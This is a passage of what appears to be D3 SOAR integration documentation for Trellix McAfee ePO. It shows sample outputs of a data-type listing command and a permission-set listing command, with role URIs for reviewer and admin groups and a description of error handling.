\\r\\n  \\\"udlp_reviewer_col\\\",\\r\\n \\r\\n  \\\"boolean\\\",\\r\\n \\r\\n  \\\"bytes\\\",\\r\\n \\r\\n  \\\"string_lookupWithResolver\\\",\\r\\n \\r\\n  \\\"udlp_common_status_col\\\",\\r\\n \\r\\n  \\\"udlp_searchable_text\\\",\\r\\n \\r\\n  \\\"udlp_InnerSelect\\\",\\r\\n \\r\\n  \\\"postgresBytea\\\",\\r\\n \\r\\n  \\\"fileUpdatedRepSummaryPostgresBytea\\\",\\r\\n \\r\\n  \\\"udlp_true_fileType_col\\\",\\r\\n \\r\\n  \\\"cert_impact\\\",\\r\\n \\r\\n  \\\"udlp_giga_col\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

type

operations

udlp_redacted_text

[

{

";name";: ";udlp_eq_redaction_op";,

";description";: ";udlp_eq_redaction_op";

}

]

fileName

[]

udlp_opeScanRun_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

}

]

multiselect_group

[

{

";name";: ";childOf";,

";description";: ";childOf";

}

]

megabytes

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

file_parent_hash

[]

float

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

productVersion

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

list_tags

[]

optionGroup_enum

[

{

";name";: ";eq";,

";description";: ";Equals";

}

]

datVersion

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

percentage

[]

udlp_incident_justification_option_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

}

]

text

[

{

";name";: ";endsWith";,

";description";: ";Ends with";

}

]

udlp_abstimestamp_withoffset_col

[

{

";name";: ";udlp_absNewerThanAbsolute_withoffset_op";,

";description";: ";udlp_absNewerThanAbsolute_withoffset_op";

}

]

string_enum

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

},

{

";name";: ";isBlank";,

";description";: ";Value is blank";

}

]

policycolumn

[

{

";name";: ";eq";,

";description";: ";Equals";

},

{

";name";: ";ne";,

";description";: ";Does not equal";

}

]

self_signed

[]

udlp_localized_lookup

[

{

";name";: ";udlp_eq_localized_op";,

";description";: ";udlp_eq_localized_op";

}

]

group

[

{

";name";: ";childOf";,

";description";: ";childOf";

}

]

isNotNull

[

{

";name";: ";isNotNullTrueFalse";,

";description";: ";isNotNullTrueFalse";

}

]

engineVersion

[

{

";name";: ";version_eq";,

";description";: ";version_eq";

}

]

udlp_string_enum

[]

eventId

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_oneToManySingleSelect

[

{

";name";: ";udlp_oneToManySingleSelect_not_equal_op";,

";description";: ";udlp_oneToManySingleSelect_not_equal_op";

}

]

udlp_abstimestamp_col

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

double

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

roleuri

[]

compositeReputation

[]

certUpdatedRepSummaryPostgresBytea

[]

timespan

[]

enum

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_durationMilliSeconds_col

[

{

";name";: ";le";,

";description";: ";Less than or equals";

}

]

int_select

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

udlp_ManyToMany

[

{

";name";: ";udlp_many2many_equal_op";,

";description";: ";udlp_many2many_equal_op";

}

]

non_arithmetic_int

[]

policynode

[

{

";name";: ";policynodeDescendsFrom";,

";description";: ";policynodeDescendsFrom";

}

]

udlp_oneToMany

[

{

";name";: ";udlp_oneToMany_not_equal_op";,

";description";: ";udlp_oneToMany_not_equal_op";

},

{

";name";: ";udlp_oneToMany_equal_op";,

";description";: ";udlp_oneToMany_equal_op";

}

]

eventIdInt

[

{

";name";: ";in";,

";description";: ";in";

}

]

string_lookup

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_ruleId_for_operational_116

[

{

";name";: ";udlp_rule_id_contains_sexp";,

";description";: ";udlp_rule_id_contains_sexp";

}

]

udlp_fk_lookup_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

},

{

";name";: ";udlp_eq_formatted_op";,

";description";: ";udlp_eq_formatted_op";

}

]

udlp_capture_search_col

[

{

";name";: ";eq";,

";description";: ";Equals";

}

]

applied_tags

[

{

";name";: ";hasTagExcluded";,

";description";: ";hasTagExcluded";

}

]

percentagefromstring

[]

string

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

children_count

[]

udlp_case_resolution_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

},

{

";name";: ";udlp_eq_formatted_op";,

";description";: ";udlp_eq_formatted_op";

}

]

udlp_string_lookup

[

{

";name";: ";udlp_eq_localized_op";,

";description";: ";udlp_eq_localized_op";

}

]

boolean_success

[

{

";name";: ";eq";,

";description";: ";Equals";

},

{

";name";: ";ne";,

";description";: ";Does not equal";

}

]

non_summable_int

[]

long

[

{

";name";: ";lt";,

";description";: ";Less than";

}

]

mac

[

{

";name";: ";mac_not_match_any";,

";description";: ";Does not match any of the following";

}

]

udlp_opeScan_col

[

{

";name";: ";udlp_ne_formatted_op";,

";description";: ";udlp_ne_formatted_op";

}

]

ipv4

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_durationSeconds_col

[

{

";name";: ";le";,

";description";: ";Less than or equals";

}

]

ipv6

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

end_entity_certificate

[]

udlp_mega_col

[

{

";name";: ";udlp_mega_gt";,

";description";: ";udlp_mega_gt";

}

]

timestamp

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

udlp_abstimestamp_endpoint_col

[

{

";name";: ";udlp_absNewerThanAbsolute_op";,

";description";: ";udlp_absNewerThanAbsolute_op";

}

]

certNewRepSummaryPostgresBytea

[]

rules_names

[]

discovery_inventory_classification

[

{

";name";: ";discovery_inventory_with_classification_op";,

";description";: ";discovery_inventory_with_classification_op";

}

]

list_col

[]

udlp_common_resolution_col

[

{

";name";: ";udlp_eq_resolution_op";,

";description";: ";udlp_eq_resolution_op";

}

]

udlp_kilo_col

[

{

";name";: ";udlp_kilo_gt";,

";description";: ";udlp_kilo_gt";

}

]

filePath

[

{

";name";: ";not_isBlank";,

";description";: ";Value is not blank";

}

]

udlp_incident_justification_action_label_col

[

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Data Type failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Data Type failed.

Status Code: 401.

Message: Unauthorized.

List Permission Set

Retrieves a list of permission sets.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "list": {
        "@id": "1",
        "permissionSet": [
            {
                "@id": "2",
                "name": "Global Reviewer",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:ENDP_FW_META.ENDP_FW_META_FW.reviewer"
                        },
                        {
                            "roleUri": "role:EPOAGENTMETA.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:MVEDR___META.MVEDR___META.reviewer"
                        },
                        {
                            "roleUri": "role:epo.core.view.tree"
                        },
                        {
                            "roleUri": "role:core.dash.viewer"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                        },
                        {
                            "roleUri": "role:MVEDR___META.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:issue.auditor?type=issue.type.untyped"
                        },
                        {
                            "roleUri": "role:TIEMGMT_META.TIEMGMT_META.reviewer"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:DXLCLNT_META.DXLCLNT_META.reviewer"
                        },
                        {
                            "roleUri": "role:softman.viewOnly"
                        },
                        {
                            "roleUri": "role:ENDP_WP_1000.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:ENDP_GS_1000.ENDP_GS_1000.reviewer"
                        },
                        {
                            "roleUri": "role:epo.dir.access",
                            "customRoleInfo": {
                                "@roleFactoryId": "epo.dir",
                                "systems": {
                                    "system": "\\\\"
                                }
                            }
                        },
                        {
                            "roleUri": "role:ENDP_AM_1000.tasks.reviewer"
                        },
                        {
                            "roleUri": "role:response.rule.user"
                        },
                        {
                            "roleUri": "role:EPOAGENTMETA.EPOAGENTMETA.reviewer"
                        },
                        {
                            "roleUri": "role:ahRole.viewOnly"
                        },
                        {
                            "roleUri": "role:rs.user"
                        },
                        {
                            "roleUri": "role:core.audit.reviewer"
                        },
                        {
                            "roleUri": "role:DXLBROKRMETA.DXLBROKRMETA.reviewer"
                        },
                        {
                            "roleUri": "role:core.query.guest"
                        },
                        {
                            "roleUri": "role:ENDP_AM_1000.ENDP_AM_1000.reviewer"
                        },
                        {
                            "roleUri": "role:TIEClientMETA.TIEClientMETA.reviewer"
                        },
                        {
                            "roleUri": "role:rollup.execute"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.UDLPSRVR2013.reviewer"
                        },
                        {
                            "roleUri": "role:core.addressbook.guest"
                        },
                        {
                            "roleUri": "role:MCPSRVER1000.MCPSRVER1000.reviewer"
                        },
                        {
                            "roleUri": "role:ENDP_WP_1000.ENDP_WP_1000.reviewer"
                        },
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:ubpRole.viewOnly"
                        },
                        {
                            "roleUri": "role:repoRole.distViewOnly"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:notes.viewOnly"
                        },
                        {
                            "roleUri": "role:scheduler.view"
                        },
                        {
                            "roleUri": "role:repoRole.masterViewOnly"
                        },
                        {
                            "roleUri": "role:ENDP_GS_1000.tasks.reviewer"
                        }
                    ]
                }
            },
            {
                "@id": "3",
                "name": "Group Reviewer",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:core.addressbook.guest"
                        },
                        {
                            "roleUri": "role:core.dash.viewer"
                        },
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:scheduler.view"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:notes.viewOnly"
                        },
                        {
                            "roleUri": "role:core.query.guest"
                        },
                        {
                            "roleUri": "role:epo.core.view.tree"
                        },
                        {
                            "roleUri": "role:response.rule.user"
                        }
                    ]
                }
            },
            {
                "@id": "4",
                "name": "Executive Reviewer",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:core.query.guest"
                        },
                        {
                            "roleUri": "role:epo.dir.access",
                            "customRoleInfo": {
                                "@roleFactoryId": "epo.dir",
                                "systems": {
                                    "system": "\\\\"
                                }
                            }
                        },
                        {
                            "roleUri": "role:core.dash.viewer"
                        },
                        {
                            "roleUri": "role:core.addressbook.guest"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        }
                    ]
                }
            },
            {
                "@id": "5",
                "name": "MCP Catalog Admin",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:common.catalog.data.general?catalogId=69c1e34e-ede8-43ae-95b0-e731d177cdab&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                        },
                        {
                            "roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                        },
                        {
                            "roleUri": "role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile="
                        },
                        {
                            "roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"
                        }
                    ]
                }
            },
            {
                "@id": "6",
                "name": "Group Active Response Editor",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.reactionRole.write"
                        },
                        {
                            "roleUri": "role:mar-server.searchRole.write"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.MARCOBA_META.admin"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.write"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:mar-server.triggerRole.write"
                        }
                    ]
                }
            },
            {
                "@id": "7",
                "name": "Group Active Response Responder",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.searchRole.write"
                        },
                        {
                            "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                        },
                        {
                            "roleUri": "role:mar-server.triggerRole.read"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:mar-server.reactionRole.read"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.read"
                        }
                    ]
                }
            },
            {
                "@id": "8",
                "name": "Group Active Response Workspace Monitor",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.searchRole.read"
                        },
                        {
                            "roleUri": "role:mar-workspace.workspace.read"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.read"
                        },
                        {
                            "roleUri": "role:tie.viewer"
                        }
                    ]
                }
            },
            {
                "@id": "9",
                "name": "Group Active Response Workspace Responder",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:mar-server.triggerRole.write"
                        },
                        {
                            "roleUri": "role:mar-server.reactionRole.run"
                        },
                        {
                            "roleUri": "role:mar-server.searchRole.write"
                        },
                        {
                            "roleUri": "role:mar-server.collectorRole.write"
                        },
                        {
                            "roleUri": "role:tie.manager"
                        },
                        {
                            "roleUri": "role:mar-workspace.workspace.write"
                        },
                        {
                            "roleUri": "role:mar-server.reactionRole.write"
                        }
                    ]
                }
            },
            {
                "@id": "10",
                "name": "Group MVISION EDR FW",
                "roles": {
                    "role": {
                        "roleUri": "role:copperfieldFw.write"
                    }
                }
            },
            {
                "@id": "11",
                "name": "Group Admin",
                "roles": {
                    "role": [
                        {
                            "roleUri": "role:udlp.helpDesk.actions.agentOverrideKey.creator"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.operational.reviewer.full"
                        },
                        {
                            "roleUri": "role:udlp.helpDesk.actions.agentUninstallKey.creator"
                        },
                        {
                            "roleUri": "role:core.addressbook.admin"
                        },
                        {
                            "roleUri": "role:core.dash.user"
                        },
                        {
                            "roleUri": "role:epo.core.modify.tree"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.policy.list?masterPerm=VIEW"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.task?email=true&purge=true&setReviewer=true"
                        },
                        {
                            "roleUri": "role:epo.productevents.view"
                        },
                        {
                            "roleUri": "role:scheduler.view"
                        },
                        {
                            "roleUri": "role:epo.core.deploy.agent"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.ruleSet.list?masterPerm=FULL"
                        },
                        {
                            "roleUri": "role:epo.event.view"
                        },
                        {
                            "roleUri": "role:notes.overRide"
                        },
                        {
                            "roleUri": "role:epo.core.tagcat.user"
                        },
                        {
                            "roleUri": "role:ubpRole.viewOnly"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.definition.list?itemTypeId80=perm.FULL&itemTypeId81=perm.FULL&itemTypeId9=perm.FULL&itemTypeId82=perm.FULL&itemTypeId8=perm.FULL&itemTypeId83=perm.FULL&itemTypeId84=perm.FULL&itemTypeId85=perm.FULL&itemTypeId20=perm.FULL&itemTypeId86=perm.FULL&itemTypeId1000=perm.FULL&itemTypeId21=perm.FULL&itemTypeId87=perm.FULL&itemTypeId88=perm.FULL&itemTypeId23=perm.FULL&itemTypeId24=perm.FULL&itemTypeId26=perm.FULL&catalogId=d3ab4ed4-efab-48d2-840d-714cbf76b888&itemTypeId3=perm.FULL&itemTypeId2=perm.FULL&itemTypeId1=perm.FULL&itemTypeId0=perm.FULL&itemTypeId6=perm.FULL&itemTypeId5=perm.FULL&itemTypeId4=perm.FULL&itemTypeId90=perm.FULL&itemTypeId91=perm.FULL&itemTypeId92=perm.FULL&itemTypeId93=perm.FULL&itemTypeId94=perm.FULL&itemTypeId10=perm.FULL&itemTypeId2000=perm.FULL&itemTypeId11=perm.FULL&itemTypeId12=perm.FULL&itemTypeId103=perm.FULL&itemTypeId79=perm.FULL&itemTypeId15=perm.FULL&itemTypeId100=perm.FULL&itemTypeId16=perm.FULL&itemTypeId17=perm.FULL&itemTypeId102=perm.FULL&itemTypeId101=perm.FULL"
                        },
                        {
                            "roleUri": "role:ahRole.viewOnly"
                        },
                        {
                            "roleUri": "role:repoRole.distViewOnly"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.reviewer.full?skyhigh=true"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.operational.task?email=true&purge=true&setReviewer=true"
                        },
                        {
                            "roleUri": "role:repoRole.masterViewOnly"
                        },
                        {
                            "roleUri": "role:epo.core.view.tree"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.redaction?view=true&reveal=true"
                        },
                        {
                            "roleUri": "role:epo.event.admin"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.discover.main.full"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.case.reviewer.full"
                        },
                        {
                            "roleUri": "role:response.rule.admin"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.capture.main.full"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.evidence?viewFile=true&viewMatch=true"
                        },
                        {
                            "roleUri": "role:udlp.helpDesk.actions.agentReleaseFromQuarantineKey.creator"
                        },
                        {
                            "roleUri": "role:udlp.helpDesk.actions.masterReleaseKey.creator"
                        },
                        {
                            "roleUri": "role:notes.fullPerms"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.classification.action?regDocsAndWhitelist=true&manualClassification=true"
                        },
                        {
                            "roleUri": "role:core.audit.reviewer"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.incident.type?endpointDiscovery=true&data=true&device=true&discovery=true&skyhigh=true"
                        },
                        {
                            "roleUri": "role:epo.core.wakeup.agent"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.classification.list?masterPerm=FULL"
                        },
                        {
                            "roleUri": "role:epo.core.tag.assign"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.dlp.settings?advancedTab=true&skyhighTab=true&caseTab=true&backupRestoreTab=true&generalTab=true&incidentTab=true&operationalTab=true"
                        },
                        {
                            "roleUri": "role:UDLPSRVR2013.rule.type.full?data=true&device=true&discovery=true"
                        },
                        {
                            "roleUri": "role:core.query.user"
                        }
                    ]
                }
            }
        ]
    }
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "@id": "2",
        "name": "Global Reviewer",
        "roles": {
            "role": [
                {
                    "roleUri": "role:ENDP_FW_META.ENDP_FW_META_FW.reviewer"
                },
                {
                    "roleUri": "role:EPOAGENTMETA.tasks.reviewer"
                },
                {
                    "roleUri": "role:MVEDR___META.MVEDR___META.reviewer"
                },
                {
                    "roleUri": "role:epo.core.view.tree"
                },
                {
                    "roleUri": "role:core.dash.viewer"
                },
                {
                    "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                },
                {
                    "roleUri": "role:MVEDR___META.tasks.reviewer"
                },
                {
                    "roleUri": "role:issue.auditor?type=issue.type.untyped"
                },
                {
                    "roleUri": "role:TIEMGMT_META.TIEMGMT_META.reviewer"
                },
                {
                    "roleUri": "role:MARCOBA_META.tasks.reviewer"
                },
                {
                    "roleUri": "role:DXLCLNT_META.DXLCLNT_META.reviewer"
                },
                {
                    "roleUri": "role:softman.viewOnly"
                },
                {
                    "roleUri": "role:ENDP_WP_1000.tasks.reviewer"
                },
                {
                    "roleUri": "role:ENDP_GS_1000.ENDP_GS_1000.reviewer"
                },
                {
                    "roleUri": "role:epo.dir.access",
                    "customRoleInfo": {
                        "@roleFactoryId": "epo.dir",
                        "systems": {
                            "system": "\\"
                        }
                    }
                },
                {
                    "roleUri": "role:ENDP_AM_1000.tasks.reviewer"
                },
                {
                    "roleUri": "role:response.rule.user"
                },
                {
                    "roleUri": "role:EPOAGENTMETA.EPOAGENTMETA.reviewer"
                },
                {
                    "roleUri": "role:ahRole.viewOnly"
                },
                {
                    "roleUri": "role:rs.user"
                },
                {
                    "roleUri": "role:core.audit.reviewer"
                },
                {
                    "roleUri": "role:DXLBROKRMETA.DXLBROKRMETA.reviewer"
                },
                {
                    "roleUri": "role:core.query.guest"
                },
                {
                    "roleUri": "role:ENDP_AM_1000.ENDP_AM_1000.reviewer"
                },
                {
                    "roleUri": "role:TIEClientMETA.TIEClientMETA.reviewer"
                },
                {
                    "roleUri": "role:rollup.execute"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.UDLPSRVR2013.reviewer"
                },
                {
                    "roleUri": "role:core.addressbook.guest"
                },
                {
                    "roleUri": "role:MCPSRVER1000.MCPSRVER1000.reviewer"
                },
                {
                    "roleUri": "role:ENDP_WP_1000.ENDP_WP_1000.reviewer"
                },
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:ubpRole.viewOnly"
                },
                {
                    "roleUri": "role:repoRole.distViewOnly"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:notes.viewOnly"
                },
                {
                    "roleUri": "role:scheduler.view"
                },
                {
                    "roleUri": "role:repoRole.masterViewOnly"
                },
                {
                    "roleUri": "role:ENDP_GS_1000.tasks.reviewer"
                }
            ]
        }
    },
    {
        "@id": "3",
        "name": "Group Reviewer",
        "roles": {
            "role": [
                {
                    "roleUri": "role:core.addressbook.guest"
                },
                {
                    "roleUri": "role:core.dash.viewer"
                },
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:scheduler.view"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:notes.viewOnly"
                },
                {
                    "roleUri": "role:core.query.guest"
                },
                {
                    "roleUri": "role:epo.core.view.tree"
                },
                {
                    "roleUri": "role:response.rule.user"
                }
            ]
        }
    },
    {
        "@id": "4",
        "name": "Executive Reviewer",
        "roles": {
            "role": [
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:core.query.guest"
                },
                {
                    "roleUri": "role:epo.dir.access",
                    "customRoleInfo": {
                        "@roleFactoryId": "epo.dir",
                        "systems": {
                            "system": "\\"
                        }
                    }
                },
                {
                    "roleUri": "role:core.dash.viewer"
                },
                {
                    "roleUri": "role:core.addressbook.guest"
                },
                {
                    "roleUri": "role:epo.event.view"
                }
            ]
        }
    },
    {
        "@id": "5",
        "name": "MCP Catalog Admin",
        "roles": {
            "role": [
                {
                    "roleUri": "role:common.catalog.data.general?catalogId=69c1e34e-ede8-43ae-95b0-e731d177cdab&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                },
                {
                    "roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                },
                {
                    "roleUri": "role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile="
                },
                {
                    "roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"
                }
            ]
        }
    },
    {
        "@id": "6",
        "name": "Group Active Response Editor",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.reactionRole.write"
                },
                {
                    "roleUri": "role:mar-server.searchRole.write"
                },
                {
                    "roleUri": "role:MARCOBA_META.MARCOBA_META.admin"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.write"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:mar-server.triggerRole.write"
                }
            ]
        }
    },
    {
        "@id": "7",
        "name": "Group Active Response Responder",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.searchRole.write"
                },
                {
                    "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                },
                {
                    "roleUri": "role:mar-server.triggerRole.read"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:mar-server.reactionRole.read"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.read"
                }
            ]
        }
    },
    {
        "@id": "8",
        "name": "Group Active Response Workspace Monitor",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.searchRole.read"
                },
                {
                    "roleUri": "role:mar-workspace.workspace.read"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.read"
                },
                {
                    "roleUri": "role:tie.viewer"
                }
            ]
        }
    },
    {
        "@id": "9",
        "name": "Group Active Response Workspace Responder",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.triggerRole.write"
                },
                {
                    "roleUri": "role:mar-server.reactionRole.run"
                },
                {
                    "roleUri": "role:mar-server.searchRole.write"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.write"
                },
                {
                    "roleUri": "role:tie.manager"
                },
                {
                    "roleUri": "role:mar-workspace.workspace.write"
                },
                {
                    "roleUri": "role:mar-server.reactionRole.write"
                }
            ]
        }
    },
    {
        "@id": "10",
        "name": "Group MVISION EDR FW",
        "roles": {
            "role": {
                "roleUri": "role:copperfieldFw.write"
            }
        }
    },
    {
        "@id": "11",
        "name": "Group Admin",
        "roles": {
            "role": [
                {
                    "roleUri": "role:udlp.helpDesk.actions.agentOverrideKey.creator"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.operational.reviewer.full"
                },
                {
                    "roleUri": "role:udlp.helpDesk.actions.agentUninstallKey.creator"
                },
                {
                    "roleUri": "role:core.addressbook.admin"
                },
                {
                    "roleUri": "role:core.dash.user"
                },
                {
                    "roleUri": "role:epo.core.modify.tree"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.policy.list?masterPerm=VIEW"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.task?email=true&purge=true&setReviewer=true"
                },
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:scheduler.view"
                },
                {
                    "roleUri": "role:epo.core.deploy.agent"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.ruleSet.list?masterPerm=FULL"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:notes.overRide"
                },
                {
                    "roleUri": "role:epo.core.tagcat.user"
                },
                {
                    "roleUri": "role:ubpRole.viewOnly"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.definition.list?itemTypeId80=perm.FULL&itemTypeId81=perm.FULL&itemTypeId9=perm.FULL&itemTypeId82=perm.FULL&itemTypeId8=perm.FULL&itemTypeId83=perm.FULL&itemTypeId84=perm.FULL&itemTypeId85=perm.FULL&itemTypeId20=perm.FULL&itemTypeId86=perm.FULL&itemTypeId1000=perm.FULL&itemTypeId21=perm.FULL&itemTypeId87=perm.FULL&itemTypeId88=perm.FULL&itemTypeId23=perm.FULL&itemTypeId24=perm.FULL&itemTypeId26=perm.FULL&catalogId=d3ab4ed4-efab-48d2-840d-714cbf76b888&itemTypeId3=perm.FULL&itemTypeId2=perm.FULL&itemTypeId1=perm.FULL&itemTypeId0=perm.FULL&itemTypeId6=perm.FULL&itemTypeId5=perm.FULL&itemTypeId4=perm.FULL&itemTypeId90=perm.FULL&itemTypeId91=perm.FULL&itemTypeId92=perm.FULL&itemTypeId93=perm.FULL&itemTypeId94=perm.FULL&itemTypeId10=perm.FULL&itemTypeId2000=perm.FULL&itemTypeId11=perm.FULL&itemTypeId12=perm.FULL&itemTypeId103=perm.FULL&itemTypeId79=perm.FULL&itemTypeId15=perm.FULL&itemTypeId100=perm.FULL&itemTypeId16=perm.FULL&itemTypeId17=perm.FULL&itemTypeId102=perm.FULL&itemTypeId101=perm.FULL"
                },
                {
                    "roleUri": "role:ahRole.viewOnly"
                },
                {
                    "roleUri": "role:repoRole.distViewOnly"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.reviewer.full?skyhigh=true"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.operational.task?email=true&purge=true&setReviewer=true"
                },
                {
                    "roleUri": "role:repoRole.masterViewOnly"
                },
                {
                    "roleUri": "role:epo.core.view.tree"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.redaction?view=true&reveal=true"
                },
                {
                    "roleUri": "role:epo.event.admin"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.discover.main.full"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.case.reviewer.full"
                },
                {
                    "roleUri": "role:response.rule.admin"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.capture.main.full"
                },
                {
